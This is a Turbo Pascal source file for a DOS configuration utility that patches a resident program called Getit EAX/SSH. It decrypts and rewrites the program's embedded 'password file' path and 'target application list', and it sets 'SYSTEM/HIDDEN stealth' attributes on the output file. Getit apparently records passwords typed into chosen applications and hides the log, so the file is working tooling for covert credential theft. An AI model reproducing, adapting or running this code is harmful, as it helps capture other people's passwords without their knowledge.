uses apps,strings,crt,dos;

var
 f : file;
 w : word;
 b : byte;
 c : char;
 pwdArr  : array [1..28] of char;
 pwdStr  : string;
 tListArr: array [1..30] of char;
 sshFMval: byte;

const
 tsr     = 'Getit EAX';
 ver     = '1.06';
 prog    = 'GX106CFG';
type
 getitVerData = record
  name     : string40;
  fs,
  checkofs,
  pwdofs,
  tListOfs : word;
  enc      : byte;
  rval     : word;
  sshFM    : word;
 end;
const
 getitMax = 6;
 getitArr : array [1..getitMax] of getitVerData =(
  (name: 'Getit EAX 1.04.alpha.a'; fs:  934; checkofs: $00E; pwdofs: $198; tListOfs: $1B6; enc: 0; rval: $E990; sshFM: $000),
  (name: 'Getit EAX 1.04.alpha.b'; fs:  934; checkofs: $00E; pwdofs: $198; tListOfs: $1B6; enc: 2; rval: $D3F6; sshFM: $000),
  (name: 'Getit EAX 1.04.release'; fs:  957; checkofs: $334; pwdofs: $198; tListOfs: $1B6; enc: 2; rval: $4E9B; sshFM: $000),
  (name: 'Getit EAX 1.05.release'; fs:  964; checkofs: $370; pwdofs: $198; tListOfs: $1B6; enc: 3; rval: $DE32; sshFM: $000),
  (name: 'Getit SSH 1.00.release'; fs: 1068; checkofs: $370; pwdofs: $198; tListOfs: $1B6; enc: 3; rval: $F174; sshFM: $000),
  (name: 'Getit SSH 1.01.release'; fs: 1076; checkofs: $370; pwdofs: $198; tListOfs: $1B6; enc: 3; rval: $F174; sshFM: $3F6)
  );
const
 getitV : byte = 0;

procedure decryptor(var c : char);
begin
 case getitArr[getitv].enc of
  0: ;
  2: c:= char(rorb (byte(c),1));
  3: c:= char(not  (byte(c)));
 end;
end;

procedure encryptor(var c : char);
begin
 case getitArr[getitv].enc of
  0: ;
  2: c:= char(rolb (byte(c),1));
  3: c:= char(not  (byte(c)));
 end;
end;


procedure getSSH;
begin
 seek (f, getitArr[getitv].sshFM);
 blockread (f, sshFMval, sizeOf(sshFMval));
 decryptor(char(sshFMval));
end;

procedure saveSSH;
begin
 encryptor(char(sshFMval));
 seek (f, getitArr[getitv].sshFM);
 blockwrite (f, sshFMval, sizeOf(sshFMval));
end;

procedure modifySSH;
var c : char;
begin
 clrScr;
 writeLn ('Modify Filemask:');
 repeat
  gotoXY (1,3);
  write (' 1. Toggle SYSTEM stealth [');
  if sshFMval and sysFile = 0
  then writeLn ('Enabled] ')
  else writeLn ('Disabled]');
  write (' 2. Toggle HIDDEN stealth [');
  if sshFMval and hidden = 0
  then writeLn ('Enabled] ')
  else writeLn ('Disabled]');
  writeLn ('Esc to return to mainmenu');
  c := readkey;
  case c of
   #00 : readkey;
   '1' : sshFMval := sshFMval xor SysFile;
   '2' : sshFMval := sshFMval xor hidden;
  end;
 until c = #27;
end;


procedure checkStrForNul (var s: string);
var b : byte;
begin
 for b := length(s) downto 1 do if s[b] = #0 then s[0]:= char(b-1);
end;

procedure upcaseAND (var s : string); assembler;
asm
 push ds
 push es
 pusha
 lds si, s
 les di, s
 xor cx, cx
 inc di
 lodsb
 mov cl, al
 jcxz @end
@l:
 lodsb
 cmp al, 'a'
 jb  @l2
 and al, 0DFh
@l2:
 stosb
 loop @l
@end:
 popa
 pop es
 pop ds
end;

const Rmax = '5';
var
 r : array ['1'..Rmax] of string;

procedure getTList;
var
 c : char;
 a,b,len : byte;
begin
 for c := '1' to Rmax do r[c] := '';
 seek (f, getitArr[getitv].tListOfs);
 blockread (f, tlistArr, sizeOf(tlistArr));
 for b := 1 to sizeOf(tListArr) do decryptor(tListArr[b]);
 a := 1;
 c := '1';
 repeat
  len := byte(tListArr[a]);
  if len <> 0 then begin
   for b:= 0 to len do begin
    r[c][b] := tListArr[a];
    inc(a);
   end;
   inc(byte(c));
  end;
 until len = 0;
end;

procedure saveTList;
var
 c : char;
 a,b,len : byte;
begin
 a := 1;
 c := '1';
 for b := 1 to sizeOf(tListArr) do tListArr[b] := #0;
 while (r[c] <> '') and (c < rmax) do begin
  len := length(r[c]);
  for b:= 0 to len do begin
   tListArr[a] := r[c][b];
   inc(a);
  end;
  inc(byte(c));
 end;
 for b := 1 to sizeOf(tListArr) do encryptor(tListArr[b]);
 seek (f, getitArr[getitv].tListOfs);
 blockwrite (f, tlistArr, sizeOf(tlistArr));
end;


procedure Rmenu;
var
 a,b : char;
 c : char;
 empty : char;

begin
 clrScr;
 repeat
  for a := '1' to Rmax do
   if r[a] <> '' then begin
    empty := '0';
    for b := a downto '1' do if r[b] = '' then empty := b;
    if empty <> '0' then begin
     r[empty] := r[a];
     r[a] := '';
    end;
   end;
  for a := '1' to Rmax do writeLn (a, ' ',r[a]);
  writeLn('Esc to return to main menu');
  repeat
   c := readkey;
   case c of
    #0: readkey;
    #27: ;
    '1'..Rmax: begin
     write('Enter string: ');
     readLn (r[c]);
     upcaseAND (r[c]);
     clrScr;
    end;
    else c:= #0;
   end;
  until c <> #0;
 until c = #27;
end;

procedure displayMenu;
begin
 clrScr;
 writeLn ('1 - View path to password file');
 writeLn ('2 - Enter new path to password file');
 writeLn ('3 - Modify target applicationlist');
 if getitArr[getitv].sshFM <> 0 then writeLn ('4 - Modify filemask');
 writeLn ('S - Save');
 writeLn ('Esc to abort');
 writeLn;
 writeLn ('WARNING: This configuration is simple, but not secure!');
 writeLn ('If you use very long strings getit may bug out!');
 writeLn;
end;

const
 verbose : boolean = false;
begin
 if paramCount = 0 then begin
  writeLn (tsr,' ',ver,' configuration program.'+rad+rad+'Usage: ');
  writeLn ('  '+prog+' <GETIT.COM> [/VERBOSE]');
  writeLn;
  writeLn ('/VERBOSE   displays some important data about the getit file.');
  writeLn ('           Usually only used by developers.');
  halt;
 end;
 for b := 2 to paramCount do begin
  if upcase_s(paramStr(b)) = '/VERBOSE' then verbose := true else
  begin
   writeLn ('Unknown parameter: ',paramStr(b));
   halt;
  end;
 end;
 if not fileExists(paramStr(1)) then begin
  writeLn ('Unable to access: ',paramStr(1));
  halt;
 end;
 assign (f, paramStr(1));
 reset  (f, 1);
 writeLn (rad+'Filesize: ',filesize(f));
 for b := 1 to getitMax do begin
  write(getitArr[b].name,': ');
  if filesize(f)=getitArr[b].fs then begin
   seek(f,getitArr[b].checkOfs);
   blockread (f,w,sizeOf(w));
   if w=getitArr[b].rval then begin
    writeLn ('Match!');
    getitv := b;
   end else writeLn ('Incorrect data')
  end else writeLn ('Incorrect filesize')
 end;
 writeLn;
 if getitv=0 then begin
   writeLn ('Unknown encryption or damaged file!');
   writeLn ('Configuration process aborted.');
   halt;
 end;
 writeLn ('Getting password file path...');
 seek (f, getitArr[getitv].pwdOfs);
 blockread (f,pwdArr,sizeOf(pwdArr));
 for b := 1 to sizeOf (pwdArr) do decryptor(pwdArr[b]);
 pwdStr := pwdArr;
 checkStrForNul (pwdStr);

 writeLn ('Getting target list...');
 getTlist;

 if getitArr[getitv].sshFM <> 0 then begin
  writeLn ('Getting SSH filemask...');
  getSSH;
 end;

 if verbose then begin
  write (rad+rad+'Press any key to continue...');
  if readkey = #0 then readkey;
 end;

 displayMenu;
 repeat
  c := upcase(readkey);
  case c of
   #0:  readkey;
   #13: displayMenu;
   '1': writeLn ('Password file: ',pwdStr);
   '2': begin
         write ('Password file: ');
         readLn(pwdStr);
         pwdStr := upcase_s(pwdStr);
        end;
   '3': begin
        Rmenu;
        displayMenu;
        end;
   '4': if getitArr[getitv].sshFM <> 0 then begin
         modifySSH;
         displayMenu;
        end;
   'S': begin
         w := length(pwdStr);
         if length (pwdStr) > sizeOf (pwdArr)
         then w := sizeOf (pwdArr)
         else w := length (pwdStr);
         for b := 1 to w do pwdArr[b] := pwdStr[b];
         for b := w+1 to sizeOf (pwdArr) do pwdArr[b] := #0;
         for b := 1 to sizeOf (pwdArr) do encryptor(pwdArr[b]);
         seek (f, getitArr[getitv].pwdOfs);
         blockwrite (f,pwdArr,sizeOf(pwdArr));
         saveTlist;
         if getitArr[getitv].sshFM <> 0 then saveSSH;
         close(f);
         clrScr;
         halt;
        end;

  end;
 until c = #27;
 clrScr;
 close(f);
end.
